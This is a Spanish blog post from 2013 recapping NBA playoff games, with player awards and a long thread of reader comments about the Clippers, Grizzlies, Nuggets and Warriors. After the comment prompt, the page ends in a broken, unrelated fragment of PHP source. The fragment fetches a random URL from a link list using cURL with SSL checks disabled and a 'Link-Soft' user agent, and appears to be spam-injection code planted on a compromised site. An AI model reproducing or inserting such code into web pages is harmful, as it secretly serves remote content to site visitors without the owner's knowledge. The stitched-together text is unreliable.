La Crónica: Match Balls para el siguiente partido

01 de May de 2013 por txusma

Grizzlies y Warriors están a solo una victoria en casa de cerrar sus series. Anoche, Memphis consiguió una victoria en Los Angeles que puede ser definitiva. Zach Randolph y Marc Gasol empequeñecieron a los jugadores interiores de los Clippers e hicieron lo que quisieron tanto en ataque como en defensa. A mediados del tercer cuarto Blake Griffin, que tampoco venía cuajando una gran actuación, se lesionó y se tuvo que retirar a los vestuarios. Fue Chris Paul el que estiró de su equipo durante todo el partido pero llegado el último cuarto tan solo fue capaz de anotar 4 puntos y tuvieron que ser sus compañeros los que remaran río arriba. Se llegaron a poner a 5 puntos pero un triple de Tayshaun Prince, fenomenal  todo el encuentro, amarró el resultado para los suyos (103-93).

Por su parte, los Warriors se quejaron del juego duro de los Nuggets y les acusaron de querer lesionar a Stephen Curry. Kenneth Faried fue el principal señalado sobretodo por un par de fuertes bloqueos sobre el base de Golden State. La realidad es que los Nuggets salieron con el cuchillo entre los dientes, se dejaron la piel en la pista y pararon el juego exterior de los de la bahía. Se hicieron dueños y señores de una zona en la que Bogut se vio superado por todas partes y Andre Iguodala emergió como el líder del equipo. El último cuarto lo empezaban con 17 puntos de ventaja pero un chispazo de genialidad de los exteriores de los Warriors la recortó hasta los 5 y dio paso a unos últimos minutos llenos de emoción. Fueron los André (Iguodala y Miller) los que a base de puntos y asistencias consiguieron que la victoria no se escapara y mantuvieron la eliminatoria abierta  (100-107). 

PREMIOS

MVP: Sólo 3 jugadores de los Nuggets han conseguido al menos 25 puntos y 10 rebotes en un partido de Playoffs y uno de ellos es ya Andre Iguodala. Además, repartió 7 asistencias.

Rookie: Los 23 puntos y 9 rebotes de Harrison Barnes el convertieron en el mejor jugador de los Warriors anoche.

Sorpresa: Tayshaun Prince aportó 15 puntos y un triple clave además de su intensidad y defensa habitual. ¿Todavía hay que dice que el traspaso con Raptors y Pistons fue malo?

Decepción: Esta vez Andrew Bogut se vio superado y acabó con sólo 2 puntos. Por su parte, Caron Butler hizo poco más que anotar 5 tristes puntos.

Esfuerzo en vano: Hasta el último cuarto Chris Paul venía jugando un partido modélico. Acabó con 35 puntos, 6 rebotes y 4 asistencias.

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Que sensación de soledad ver las estadísticas de los Clippers,Paul,Crawford y para de contar.Puede ser un zarpazo definitivo si los Grizzlies no se acobardan en casa.Es de esperar otro partido de CP3 de estos cuando se ponen modo leyenda pero vamos a ver si ofrecen algo más.De todas formas animando a Memphis que en una serie contra Thunder me ofrecen muchísimas más garantías gracias a su defensa y a su duo interior.

      Citar

  2. Jose Luis dice:
    #2

    ¿Los Warriors se quejan de dureza? No le veo sentido, ¿vieron la falta flagrante de Bogut a Faried? Es la única falta dura que se ve en el resumen de NBA.com.

    Los Clippers eso, mucha plantilla, pero jugadores como Barnes, Butler, Green, Billups, Turiaf, Hollins, Odom, Hillincluso quizá Jordan, no son de PO. No puedes basar tu plantilla en 8-9 tíos como estos, puedes tener 2-3, pero no toda la plantilla.

      Citar

  3. HisRoyalAirness dice:
    #3

    Qué grandes los ositos!! No pude verlo y qué alegría me acabo de llevar!
    Tayshaun estuvo los 2 primeros partidos sin hacer nada y en estos últimos está fenomenal, y en defensa lo he visto increíble.

    Voy a decir algo aunque igual me ponéis verde: estos Grizzlies o los Spurs son los únicos capaces de ganarle una serie a los Heat.

      Citar

  4. Ruxixón dice:
    #4

    HisRoyalAirness:
    Voy a decir algo aunque igual me ponéis verde: estos Grizzlies o los Spurs son los únicos capaces de ganarle una serie a los Heat.

    La verdad que la pareja interior de Memphis puede hacer mucho daño a Miami,quizás sea el equipo presente en estos PO que a priori más daño le puede hacer,pero paso a paso,primero cerrar la serie y después a vérselas contra Oklahoma.

      Citar

  5. Jose Luis dice:
    #5

    Lo que no sé es cómo aposté por los Clippers 4-2 xD si llevo todo el año diciendo que para PO no valen…

      Citar

  6. rumbero dice:
    #6

    Los Nuggets no podían salir de otra manera jugando en casa, con un 3-1 en contra y habiendo encajado 120 puntos por noche siendo unas madres en defensa. Ayer subieron como 10 peldaños en agresividad y estuvieron al límite con Curry que si que es cierto que se llevó un par de regalitos especialmente de Faried en plan “hoy ten cuidado chaval”. Para mi nada que no hayamos visto ya en PO, que cuando hablamos de que sube el nível defensivo es también por estas cosas. A los Nuggets les queda esto (aunque en Oakland no les van a permitir ni la mitad) y aprovechar su superioridad en la pintura que es lo que les ha llevado a acabar 3º en el oeste

      Citar

  7. Enzo Rodriguez dice:
    #7

    Que Billups no es jugador de PO si cuando fue campeon fue MVP de las finales.

      Citar

  8. Jose Luis dice:
    #8

    Si Enzo, no te lo discuto, pero no actualmente.

    Eso es como si me dices que los Hawks Rockets para remontar deben convocar a Mutombo u Olajuwon.

      Citar

  9. Sempren dice:
    #9

    Cierto es que yo tiro por los Nuggets (aunque supongo que como a casi todos me caen bien los Warriors y flipo con Curry), pero tampoco vi nada que se pueda decir que fue “ir a por alguien”. Tampoco la flagrante de Bogut, se le fue la olla y se olvidó del balón, pero creo que el australiano era bien consciente y no iba en absoluto a hacer daño.

    La superioridad interior de Denver me está decepcionando: evidentemente se expresa en rebotes (aunque los 4 ofensivos de Bogut en la primera parte tendrían que sonrojarlos), pero para casi nada en ataque, ayer muy inoperantes todos los pivots.
    Ya en la última crónica apuntaba txusma que Karl debería replantearse su apuesta por Chandler como center, y es que estoy muy sorprendido que tras toda la temporada con Koufos como titular, McGee de suplente, y sí algunos minutos con Gallo y Faried como pareja interior, casi se hubiera invertido la tendencia.
    Vale que el griego entra en esa lista de jugadores de los Clippers que “no son jugadores de PO”, pero vaya, si llevas todo el año utilizando esa variante y funcionaba, no entiendo el cambio ahora.
    Ayer metió a Javale de titular, y bueno, el chaval es lo que es, mucha clase y poca cabeza.

    PD: qué bueno es Iguodala y qué poco me gusta cuando empieza a revolucionarse, que es demasiado a menudo.

      Citar

  10. Denise dice:
    #10

    Jose Luis:

    Los Clippers eso, mucha plantilla, pero jugadores como Barnes, Butler, Green, Billups, Turiaf, Hollins, Odom, Hillincluso quizá Jordan, no son de PO. No puedes basar tu plantilla en 8-9 tíos como estos, puedes tener 2-3, pero no toda la plantilla.

    Yo no estoy de acuerdo.
    Todos esos jugadores que nombras me parecen muy buenos para rodear a tus jugadores franquicias. El problema de Clippers es que su pareja titular interior Griffin-Jordan está siendo comida por Zach y Marc, al margen de que enfrente también hay un rival como son los Grizzlies y son bastante buenos. Van 3-2, tampoco están siendo vapuleados, y yo confío aun en Clippers.
    Por ejemplo, este nucleo de jugadores de equipo me parecen mejores que Miller, Battier, Cole, Andersen, Anthony, James Jones y demas suplentes de Heat ó infinitamente mejores que Kevin Martin, Reggie Jackson, Lamb, Collison y Thabeet. La diferencia es que tanto Heat como Thunder cuentan con autenticos jugadorazos como hombres-franquicia.

      Citar

  11. max dice:
    #11

    Para mi Chris Paul no está muy lejos de los jugadores franquicia de los Heat o los Thunder, lease Lebron o Durant. Él sólo es capaz de decidir un partido o una serie. El problema es que si el número dos del equipo (Griffin) no está a su nivel, entonces LAC bajan mucho sus prestaciones. Pero eso le pasa a cualquier equipo. OKC sin Westbrook veremos donde llegan y MIA sin Wade me gustaria verlo….

      Citar

  12. Denise dice:
    #12

    max:
    Para mi Chris Paul no está muy lejos de los jugadores franquicia de los Heat o los Thunder, lease Lebron o Durant. Él sólo es capaz de decidir un partido o una serie. El problema es que si el número dos del equipo (Griffin) no está a su nivel, entonces LAC bajan mucho sus prestaciones. Pero eso le pasa a cualquier equipo. OKC sin Westbrook veremos donde llegan y MIA sin Wade me gustaria verlo….

    A eso es lo que voy, Paul está jugando bien, no a un modo MVP, pero está dando el nivel, el problema de los Clippers les está llegando por dentro, donde Zach se está comiendo tanto en ataque como en defensa a Griffin; y Jordan vale que no tiene recursos y movimientos ofensuvos, pero joder, con el cuerpo que tiene le podría sacar mas faltas a Marc y anotar algunas canastas a base de mates y rebotes ofensivos.
    Ya digo, el banquillo para mí esta cumpliendo con su rol.

      Citar

  13. Denise dice:
    #13

    En las 3 derrotas contra los Grizzlies:

    En el primer partido perdido:
    Paul (8 puntos, 4 asist), Griffin 16 ptos y 2 miseros rebotes en 35 minutos!!, Butler 10 puntos, Billups (11), Barnes (12), Odom (9), Turiaf (4)

    Segundo partido perdido:
    Bien Paul y Griffin (19.6 y 19.1o0 respectivamente), Jordan 2 puntos, 2 rebotes en 17 minutos, mal Butler y Billups, pero bien el banquillo sin contar a Crawford, Hollins (5), Barnes (6), Odom (5), Bledsoe (9 ptos, 5 asist) y Turiaf (4)

    Tercer partido perdido:
    Paul muy bien con 35 puntos, Griffin muy mal aunque con la excusa del tobillo (4 ptos, 5 rebotes), y Barnes (6ptos, 9 rebotes), Odom (5 ptos, 4 rebotes en 13 min), Hollins (4), Bledsoe (7), Turiaf (3)

    Yo no sé que problema hay con estos tios…para mi los palos (si es que hay que dar porque tampoco están haciendo el ridiculo) deben ir dirigidos a los titulares.

      Citar

  14. Jose Luis dice:
    #14

    Yo le he dado palos a Butler, Jordan y Billups, que los tres son titulares. Aparte también al banquillo, pero de los titulares solo salvo a Paul y Griffin.

      Citar

  15. MagicJohnson32 dice:
    #15

    Igual los Clippers lo que necesitan es un buen entrenador…

      Citar

  16. Jose Luis dice:
    #16

    Tal como está el Este, creo que Lebron en solitario, o cualquier pareja del big-three que me digáis con el otro miembro lesionado, se plantaría en las Finales sin despeinarse

      Citar

  17. Lucho dice:
    #17

    Sigo pensando que van a pasar los Knicks, pero hasta ahora parecia que estaban jugando una serie cualquiera. Contra Nets, Hawks o Bucks, por decir algo. Un 3-1 normal ante un equipo inferior.
    El partido de hoy fue lo que todos estabamos esperando para comprobar que eran los C`s. El “van a vender cara su piel” necesitaba un golpecito al orden establecido, el no entregarse solo xq el otro es mejor equipo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>